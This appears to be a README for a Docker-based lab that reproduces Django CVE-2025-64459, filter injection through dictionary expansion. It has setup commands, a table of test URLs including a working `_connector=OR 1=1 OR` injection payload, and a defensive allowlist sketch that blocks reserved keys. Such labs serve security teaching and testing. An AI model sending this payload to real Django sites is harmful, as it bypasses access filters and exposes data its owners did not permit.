A self-contained testbed for Django CVE-2025-64459. Demonstrates `QuerySet.filter()` parameter injection via dictionary expansion using Docker.
CVE-2025-64459 is a high-severity vulnerability in Django (specifically versions < 5.1.14) that allows parameter injection in `QuerySet.filter()` when user input is passed directly via dictionary expansion (e.g., `**request.GET`).
Attackers can inject internal parameters like `_connector` to manipulate query logic (e.g., changing AND to OR), potentially bypassing filters and accessing unauthorized data.

If you have the Vulnerable Target CLI installed or want to run it from source:

- Clone the Vulnerable Target repository:

  ```bash
  git clone https://github.com/HappyHackingSpace/vulnerable-target
  cd vulnerable-target
  ```

- Run the lab using the ID:

  ```bash
  go run cmd/vt/main.go start --id vt-2025-64459
  ```

- b00m!
- with Nuclei

| Description | Link |
|---|---|
| Show All (Empty Search) | /? |
| Normal Search | /?title__icontains=Public |
| Exploit Attempt (Private) | /?status=private&title__icontains=Area |
| _connector Exploit (CVE-2025-64459) | /?_connector=OR 1=1 OR&title__icontains=Public |
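
A mitigation sketch for application code that cannot avoid building filters from the query string, run against the four query strings from the table above. This is an added example, not code from this lab or from Django: `ALLOWED_LOOKUPS`, `safe_filter_kwargs` and `check` are hypothetical names, and the allowlist (only `title` is searchable) is an assumption about what the view intends to expose.

```python
from urllib.parse import parse_qsl

# Assumed allowlist for this sketch: field name -> lookups the view exposes.
ALLOWED_LOOKUPS = {"title": {"exact", "icontains"}}
# Keyword arguments that Django's Q() treats as control parameters, not fields.
RESERVED_KEYS = {"_connector", "_negated"}


class RejectedParameter(ValueError):
    """Raised when a query-string key must not reach QuerySet.filter()."""


def safe_filter_kwargs(query_string):
    """Turn a raw query string into kwargs that can be expanded into filter()."""
    kwargs = {}
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        if key in RESERVED_KEYS or key.startswith("_"):
            raise RejectedParameter(f"reserved parameter: {key!r}")
        field, _, lookup = key.partition("__")
        name = f"{field}__{lookup or 'exact'}"
        if (lookup or "exact") not in ALLOWED_LOOKUPS.get(field, ()):
            raise RejectedParameter(f"lookup not allowed: {key!r}")
        if name in kwargs:
            raise RejectedParameter(f"duplicate parameter: {key!r}")
        kwargs[name] = value
    return kwargs


def check(query_string):
    """Return ('ok', kwargs) or ('rejected', reason), e.g. for logging."""
    try:
        return "ok", safe_filter_kwargs(query_string)
    except RejectedParameter as exc:
        return "rejected", str(exc)


# Query strings taken from the link table above (without the leading "/?").
SAMPLES = [
    "",
    "title__icontains=Public",
    "status=private&title__icontains=Area",
    "_connector=OR 1=1 OR&title__icontains=Public",
]

if __name__ == "__main__":
    # In a view (hypothetical model): Post.objects.filter(**safe_filter_kwargs(qs))
    for qs in SAMPLES:
        print(repr(qs), "->", check(qs))
```

A rejected request is also a useful detection signal: a `_connector` key in a query string has no legitimate source in normal browsing.
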
This repository is for educational and research purposes only. Do not use this on systems you do not own or have explicit permission to test. The author is not responsible for any misuse of this information.